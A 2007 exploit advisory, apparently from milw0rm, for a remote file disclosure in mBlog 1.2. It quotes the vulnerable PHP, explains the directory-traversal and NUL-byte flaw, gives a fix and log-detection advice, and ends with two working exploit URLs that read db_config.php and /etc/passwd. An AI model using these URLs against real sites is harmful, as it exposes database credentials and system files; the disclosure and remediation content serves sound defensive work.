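:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:                                                                             :
:  vuln.: mBlog 1.2 Remote File Disclosure Vulnerability                      :
:                                                                             :
:  script info and download: http://www.c97.net/dl/index.php?act=view&id=8    :
:                                                                             :
:  no dork for s-kiddie [;                                                    :
:                                                                             :
:                                                                             :
:  author: irk4z[at]yahoo.pl                                                  :
:  greets to: str0ke, wacky, wszystkich polaków ;]                            :
:                                                                             :
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

# code:

./includes/tpl.php, 41-56:

...
41  // load_tpl
42  // loding a template file into a varible.
43  // use quick_tpl to display template
44  function load_tpl ($path)
45  {
46      $tpl = '';
47      global $tpl_block;
48
49      if (substr ($path, -4) == '.tpl')
50      {
51          if (strpos (Cur_Url (), 'includes%2F') OR strpos (Cur_Url (), 'admin%2F') OR strpos (Cur_Url (), 'members%2F')) $path = '../'.$path;
52          if (!file_exists ($path)) die ("Template $path not found! Contact webmaster.");
53          $fp = fopen($path,'r');
54          while(!feof($fp)) $tpl .= fgets($fp,4096);
55          fclose ($fp);
56      }
...

load_tpl() 'loading a template file into a varible.' ;]

./index.php, 24-30:

...
24  // proses cmd
25  switch ($mode)
26  {
27      case 'page':
28          $txt['main_body'] = quick_tpl (load_tpl ($config['skin']."/$page.tpl"), 0);
29          flush_tpl ();
30      break;
...

file disclosure in $page :*

# root cause and fix:

$page reaches load_tpl() unfiltered (it is supplied in the query string, see the URLs below) and is concatenated into the template path, so "../" sequences leave the skin directory. The '.tpl' suffix test on line 49 is applied to the PHP string, which still ends in ".tpl"; on older PHP versions the NUL byte (%00) truncates the path at the filesystem layer, so the suffix is never part of the file that is opened (PHP rejects NUL bytes in paths since 5.3.4). The fix belongs in index.php before line 28: accept $page only if it matches an allowlist of known page names (or at least a strict pattern such as letters, digits, '_' and '-'), and have load_tpl() verify that realpath($path) stays inside the skin directory. For detection, look in the web server logs for index.php requests with mode=page whose page parameter contains "../" or "%00".

# exploit:

(%69%6E%63%6C%75%64%65%73 = includes)

http://[host]/[path]/index.php?mode=page&page=../../%69%6E%63%6C%75%64%65%73/db_config.php%00
http://[host]/[path]/index.php?mode=page&page=../../../../../../../../etc/passwd%00

# milw0rm.com [2007-12-21]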